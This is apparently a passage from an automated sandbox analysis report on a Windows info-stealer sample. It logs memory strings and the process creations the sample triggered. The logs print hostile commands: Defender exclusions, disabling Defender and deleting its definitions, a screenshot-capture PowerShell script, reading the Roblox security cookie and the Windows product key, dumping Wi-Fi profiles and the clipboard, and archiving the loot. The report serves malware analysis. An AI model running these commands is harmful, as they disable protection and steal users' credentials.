              Source: X9g8L63QGs.exe, 00000007.00000003.1595011521.000001E7C3017000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1487994418.000001E7C2F90000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A01000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A05000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593207468.000001E7C2F90000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1454766245.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1478379972.000001E7C3A02000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593207468.000001E7C2FDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fvboxtray
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Wf8vmusrvc
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: >fvmtoolsd
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Jfvmwareuser
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C266D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C266D19C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1AB121D0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,7_2_00007FFB1AB121D0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C26834F0 GetProcessHeap,4_2_00007FF7C26834F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C266D37C SetUnhandledExceptionFilter,4_2_00007FF7C266D37C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C266D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C266D19C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C266C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7C266C910
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C267A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C267A684
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FF7C266D37C SetUnhandledExceptionFilter,7_2_00007FF7C266D37C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FF7C266D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7C266D19C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FF7C266C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF7C266C910
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FF7C267A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7C267A684
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B3028 IsProcessorFeaturePresent,00007FFB1C261A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFB1C261A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB0B8B3028
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0C1ABE40 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB0C1ABE40
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1AB04630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1AB04630
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1B6F6524 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1B6F6524
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1BA49050 SetUnhandledExceptionFilter,7_2_00007FFB1BA49050
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1BA43328 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1BA43328
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1BB1A9DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1BB1A9DC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1C260E08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FFB1C260E08
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1D341CD0 IsProcessorFeaturePresent,00007FFB1C261A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFB1C261A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1D341CD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1D5B1AA0 IsProcessorFeaturePresent,00007FFB1C261A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFB1C261A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1D5B1AA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe Code function: 97_2_00007FF7080F4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,97_2_00007FF7080F4C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe Code function: 97_2_00007FF7080EB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,97_2_00007FF7080EB52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe Code function: 97_2_00007FF7080EA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,97_2_00007FF7080EA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe Code function: 97_2_00007FF7080EB6D8 SetUnhandledExceptionFilter,97_2_00007FF7080EB6D8

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Users\user\Desktop\X9g8L63QGs.exe "C:\Users\user\Desktop\X9g8L63QGs.exe"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand
